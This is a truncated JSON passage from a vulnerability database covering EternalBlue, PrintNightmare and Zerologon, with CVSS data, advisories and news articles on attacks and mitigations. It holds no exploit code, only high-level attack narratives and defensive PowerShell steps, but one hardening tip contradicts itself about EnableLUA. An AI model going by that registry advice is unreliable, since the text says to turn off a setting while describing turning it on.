"cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144"], "modified": "2017-07-22T20:30:34", "id": "KITPLOIT:9146046356497464176", "href": "http://www.kitploit.com/2017/07/eternal-internet-scanner-for-eternal.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:19", "description": "A remote code execution vulnerability exists in the Windows Print Spooler service. A remote, authenticated attacker can exploit this issue by sending a specially crafted packet to the target server. Successful exploitation could result in execution of arbitrary code on the affected system. AKA \"PrintNightmare\".", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T00:00:00", "type": "checkpoint_advisories", "title": "Windows Print Spooler Remote Code Execution (CVE-2021-34527)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T00:00:00", "id": "CPAI-2021-0465", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:35:33", "description": "A remote code execution vulnerability exist in Microsoft Server Message Block 1.0 (SMBv1). The vulnerability is due to the way SMBv1 service handles certain requests. An attacker who successfully exploited the vulnerability could gain code execution on the target server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows SMB Remote Code Execution (MS17-010: CVE-2017-0144)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144"], "modified": "2017-07-05T00:00:00", "id": "CPAI-2017-0198", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:36:41", "description": "A privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected. Successful exploitation of this vulnerability could allow an attacker to run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-04T00:00:00", "type": "checkpoint_advisories", "title": "Winlogon Privilege Escalation (CVE-2020-1472)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-12-06T00:00:00", "id": "CPAI-2020-1095", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:37:50", "description": "An elevation of privilege vulnerability exists in Microsoft Netlogon. Successful exploitation of this vulnerability could allow an attacker to run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Netlogon Elevation of Privilege (CVE-2020-1472)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T00:00:00", "id": "CPAI-2020-0872", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-23T15:30:40", "description": "Windows Print Spooler Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T22:15:00", "type": "cve", "title": "CVE-2021-34527", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-02T21:08:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-34527", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34527", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:25:04", "description": "An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-08-17T19:15:00", "type": "cve", "title": "CVE-2020-1472", "cwe": ["CWE-330"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-04-26T17:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:fedoraproject:fedora:31", "cpe:/o:opensuse:leap:15.2", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:opensuse:leap:15.1", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:oracle:zfs_storage_appliance_kit:8.8", "cpe:/o:canonical:ubuntu_linux:20.04"], "id": "CVE-2020-1472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}], "thn": [{"lastseen": "2022-05-09T12:37:27", "description": "[![FBI, CISA and Russian Hackers](https://thehackernews.com/new-images/img/a/AVvXsEi78Lgh1-a_Rlugh-jIjcQsT3okz4dkvUH1BpDGD2uThowKvsO7WgxJ7CzE9cAixe67YOA9inVSnZzZWhfA7bAV4ymALr-GCIvlvpRTka6rQROItUoRgAGIdaDtlEUPPeof7gjztGdh1UfjFIt_ps35SJsa5HNgqIppsi2kHJdv2NVQR31hMzFoIXUh=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEi78Lgh1-a_Rlugh-jIjcQsT3okz4dkvUH1BpDGD2uThowKvsO7WgxJ7CzE9cAixe67YOA9inVSnZzZWhfA7bAV4ymALr-GCIvlvpRTka6rQROItUoRgAGIdaDtlEUPPeof7gjztGdh1UfjFIt_ps35SJsa5HNgqIppsi2kHJdv2NVQR31hMzFoIXUh>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have released a joint advisory warning that Russia-backed threat actors hacked the network of an unnamed non-governmental entity by exploiting a combination of flaws.\n\n\"As early as May 2021, Russian state-sponsored cyber actors took advantage of a misconfigured account set to default [multi-factor authentication] protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>).\n\n\"The actors then exploited a critical Windows Print Spooler vulnerability, 'PrintNightmare' ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>)) to run arbitrary code with system privileges.\"\n\nThe attack was pulled off by gaining initial access to the victim organization via compromised credentials \u2013 obtained by means of a brute-force password guessing attack \u2013 and enrolling a new device in the organization's [Duo MFA](<https://duo.com/product/multi-factor-authentication-mfa>).\n\nIt's also noteworthy that the breached account was un-enrolled from Duo due to a long period of inactivity, but had not yet been disabled in the NGO's Active Directory, thereby allowing the attackers to escalate their privileges using the PrintNightmare flaw and disable the MFA service altogether.\n\n\"As Duo's default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network,\" the agencies explained.\n\nTurning off MFA, in turn, allowed the state-sponsored actors to authenticate to the NGO's virtual private network (VPN) as non-administrator users, connect to Windows domain controllers via Remote Desktop Protocol (RDP), and obtain credentials for other domain accounts.\n\nIn the final stage of the attack, the newly compromised accounts were subsequently utilized to move laterally across the network to siphon data from the organization's cloud storage and email accounts.\n\nTo mitigate such attacks, both CISA and FBI are recommending organizations to enforce and review multi-factor authentication configuration policies, disable inactive accounts in Active Directory, and prioritize patching for [known exploited flaws](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T13:29:00", "type": "thn", "title": "FBI, CISA Warn of Russian Hackers Exploiting MFA and PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-16T13:29:45", "id": "THN:A52CF43B8B04C0A2F8413E17698F9308", "href": "https://thehackernews.com/2022/03/fbi-cisa-warn-of-russian-hackers.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:22", "description": "[![Microsoft Print Spooler Vulnerability](https://thehackernews.com/images/-J4q0IawSomE/YOSMoHyRjgI/AAAAAAAABHE/cP0YFHHZFtA9uluA4FTtUF6qLpRtEeAEgCLcBGAsYHQ/s728-e1000/Microsoft-PrintSpooler-Vulnerability.jpg)](<https://thehackernews.com/images/-J4q0IawSomE/YOSMoHyRjgI/AAAAAAAABHE/cP0YFHHZFtA9uluA4FTtUF6qLpRtEeAEgCLcBGAsYHQ/s0/Microsoft-PrintSpooler-Vulnerability.jpg>)\n\nThis week, **PrintNightmare** \\- Microsoft's Print Spooler vulnerability (CVE-2021-34527) was upgraded from a 'Low' criticality to a 'Critical' criticality.\n\nThis is due to a Proof of Concept published on GitHub, which attackers could potentially leverage for gaining access to Domain Controllers.\n\nAs we [reported earlier](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>), Microsoft already released a patch in June 2021, but it wasn't enough to stop exploits. Attackers can still use Print Spooler when connecting remotely. You can find all you need to know about this vulnerability in this article and how you can mitigate it (and you can). \n\n**Print Spooler in a nutshell:** Print Spooler is Microsoft's service for managing and monitoring files printing. This service is among Microsoft's oldest and has had minimal maintenance updates since it was released. \n\nEvery Microsoft machine (servers and endpoints) has this feature enabled by default.\n\n**PrintNightmare vulnerability:** As soon as an attacker gains limited user access to a network, he will be able to connect (directly or remotely) to the Print Spooler. Since the Print Spooler has direct access to the kernel, the attacker can use it to gain access to the operating system, run remote code with system privileges, and ultimately attack the Domain Controller.\n\nYour best option when it comes to mitigating the PrintNightmare vulnerability is to disable the Print Spooler on every server and/or sensitive workstation (such as administrators' workstations, direct internet-facing workstations, and non-printing workstations).\n\nThis is what Dvir Goren's, hardening expert and CTO at [CalCom Software Solutions](<https://www.calcomsoftware.com/?utm_source=HN>), suggests as your first move towards mitigation.\n\nFollow these steps to disable the Print Spooler service on Windows 10:\n\n 1. Open Start.\n 2. Search for PowerShell, right-click on it and select the Run as administrator.\n 3. Type the command and press Enter: _Stop-Service -Name Spooler -Force_\n 4. Use this command to prevent the service from starting back up again during restart: Set-Service -Name Spooler -StartupType Disabled\n\nAccording to Dvir's experience, 90% of servers do not require Print Spooler. It is the default configuration for most of them, so it is usually enabled. As a result, disabling it can solve 90% of your problem and have little impact on production.\n\nIn large and complex infrastructures, it can be challenging to locate where Print Spooler is used.\n\nHere are a few examples where Print Spooler is required:\n\n 1. When using Citrix services,\n 2. Fax servers,\n 3. Any application requiring virtual or physical printing of PDFs, XPSs, etc. Billing services and wage applications, for example.\n\nHere are a few examples when Print Spooler is not needed but enabled by default:\n\n 1. Domain Controller and Active Directory \u2013 the main risk in this vulnerability can be neutralized by practicing basic cyber hygiene. It makes no sense to have Print Spooler enabled in DCs and AD servers. \n 2. Member servers such as SQL, File System, and Exchange servers. \n 3. Machines that do not require printing. \n\nA few other hardening steps suggested by Dvir for machines dependent on Print Spooler include:\n\n 1. Replace the vulnerable Print Spooler protocol with a non-Microsoft service. \n 2. By changing 'Allow Print Spooler to accept client connections', you can restrict users' and drivers' access to the Print Spooler to groups that must use it.\n 3. Disable Print Spooler caller in Pre-Windows 2000 compatibility group.\n 4. Make sure that Point and Print is not configured to No Warning \u2013 check registry key SOFTWARE/Policies/Microsoft/Windows NT/Printers/PointAndPrint/NoElevationOnInstall for DWORD value 1 and change it to 0.\n 5. Turn off EnableLUA \u2013 check registry key SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System/EnableLUA for DWORD value 0 and change it to 1.\n\nHere's what you need to do next to ensure your organization is secure:\n\n 1. Identify where Print Spooler is being used on your network. \n 2. Map your network to find the machines that must use Print Spooler.\n 3. Disable Print Spooler on machines that do not use it. \n 4. For machines that require Print Spooler \u2013 configure them in a way to minimize its attack surface. \n\nBeside this, to find potential evidence of exploitation, you should also monitor Microsoft-Windows-PrintService/Admin log entries. There might be entries with error messages that indicate Print Spooler can't load plug-in module DLLs, although this can also happen if an attacker packaged a legitimate DLL that Print Spooler demands.\n\nThe final recommendation from Dvir is to implement these recommendations through[ hardening automation tools](<https://www.calcomsoftware.com/best-hardening-tools/?utm_source=HN>). Without automation, you will spend countless hours attempting to harden manually and may end up vulnerable or causing systems to go down\n\nAfter choosing your course of action, a [Hardening automation tool](<https://www.calcomsoftware.com/server-hardening-suite/?utm_source=HN>) will discover where Print Spooler is enabled, where they are actually used, and disable or reconfigure them automatically.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T09:32:00", "type": "thn", "title": "How to Mitigate Microsoft Print Spooler Vulnerability \u2013 PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T15:05:22", "id": "THN:10A732F6ED612DC7431BDC9A3CEC3A29", "href": "https://thehackernews.com/2021/07/how-to-mitigate-microsoft-print-spooler.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-07-06T07:58:10", "description": "[![Anonymized Ransomware Sites on Dark Web](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhW8mCPe27LdzHLP4ngj6tlt2Pg8kCf_fM8vePiD96oqVL7MUOW8zxZlXFGU1HvblavK2Xdcm0tf2j7r5qbvTV9iW1N9M95vbWmuFsGUq0MkEeY7rnkpeop76NG41Eys_CeiCVl0xS8l4E21-RosfCrVOTGYR8jNw1F5Q2v-OjF2MeqKfBbPn6bDseq/s728-e1000/ransomware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhW8mCPe27LdzHLP4ngj6tlt2Pg8kCf_fM8vePiD96oqVL7MUOW8zxZlXFGU1HvblavK2Xdcm0tf2j7r5qbvTV9iW1N9M95vbWmuFsGUq0MkEeY7rnkpeop76NG41Eys_CeiCVl0xS8l4E21-RosfCrVOTGYR8jNw1F5Q2v-OjF2MeqKfBbPn6bDseq/s728-e100/ransomware.jpg>)\n\nCybersecurity researchers have detailed the various measures ransomware actors have taken to obscure their true identity online as well as the hosting location of their web server infrastructure.\n\n\"Most ransomware operators use hosting providers outside their country of origin (such as Sweden, Germany, and Singapore) to host their ransomware operations sites,\" Cisco Talos researcher Paul Eubanks [said](<https://blog.talosintelligence.com/2022/06/de-anonymizing-ransomware-domains-on.html>). \"They use VPS hop-points as a proxy to hide their true location when they connect to their ransomware web infrastructure for remote administration tasks.\"\n\nAlso prominent are the use of the TOR network and DNS proxy registration services to provide an added layer of anonymity for their illegal operations.\n\nBut by taking advantage of the threat actors' operational security missteps and other techniques, the cybersecurity firm disclosed last week that it was able to identify TOR hidden services hosted on public IP addresses, some of which are previously unknown infrastructure associated with [DarkAngels](<https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/>), [Snatch](<https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch>), [Quantum](<https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware>), and [Nokoyawa](<https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa>) ransomware groups.\n\nWhile ransomware groups are known to rely on the dark web to conceal their illicit activities ranging from leaking stolen data to negotiating payments with victims, Talos disclosed that it was able to identify \"public IP addresses hosting the same threat actor infrastructure as those on the dark web.\"\n\n\"The methods we used to identify the public internet IPs involved matching threat actors' [self-signed] [TLS certificate](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>) serial numbers and page elements with those indexed on the public internet,\" Eubanks said.\n\n[![Anonymized Ransomware Sites on Dark Web](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaV9wVlzzeADW3plTap4jOh9fqaG1M5Q8q7q-pX6vbN6EAWqHqnEEvq-nA0yW2N64kchUyacQRbSQXnYk0i2qcd2Lxjiu4alpeum5cu6QCPMBvjt90TSKl-7opy4d0YCn8MX_tPYh7B04Vidh2gZfgYJXxKGevp9NbNa8lZg-DQGZXl7xjDrvwfK89/s728-e1000/cert.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaV9wVlzzeADW3plTap4jOh9fqaG1M5Q8q7q-pX6vbN6EAWqHqnEEvq-nA0yW2N64kchUyacQRbSQXnYk0i2qcd2Lxjiu4alpeum5cu6QCPMBvjt90TSKl-7opy4d0YCn8MX_tPYh7B04Vidh2gZfgYJXxKGevp9NbNa8lZg-DQGZXl7xjDrvwfK89/s728-e100/cert.jpg>)\n\nBesides TLS certificate matching, a second method employed to uncover the adversaries' clear web infrastructures entailed checking the favicons associated with the darknet websites against the public internet using web crawlers like Shodan.\n\nIn the case of [Nokoyawa](<https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up>), a new Windows ransomware strain that appeared earlier this year and shares substantial code similarities with Karma, the site hosted on the TOR hidden service was found to harbor a directory traversal flaw that enabled the researchers to access the \"[/var/log/auth.log](<https://help.ubuntu.com/community/LinuxLogFiles>)\" file used to capture user logins.\n\nThe findings demonstrate that not only are the criminal actors' leak sites accessible for any user on the internet, other infrastructure components, including identifying server data, were left exposed, effectively making it possible to obtain the login locations used to administer the ransomware servers.\n\n[![Anonymized 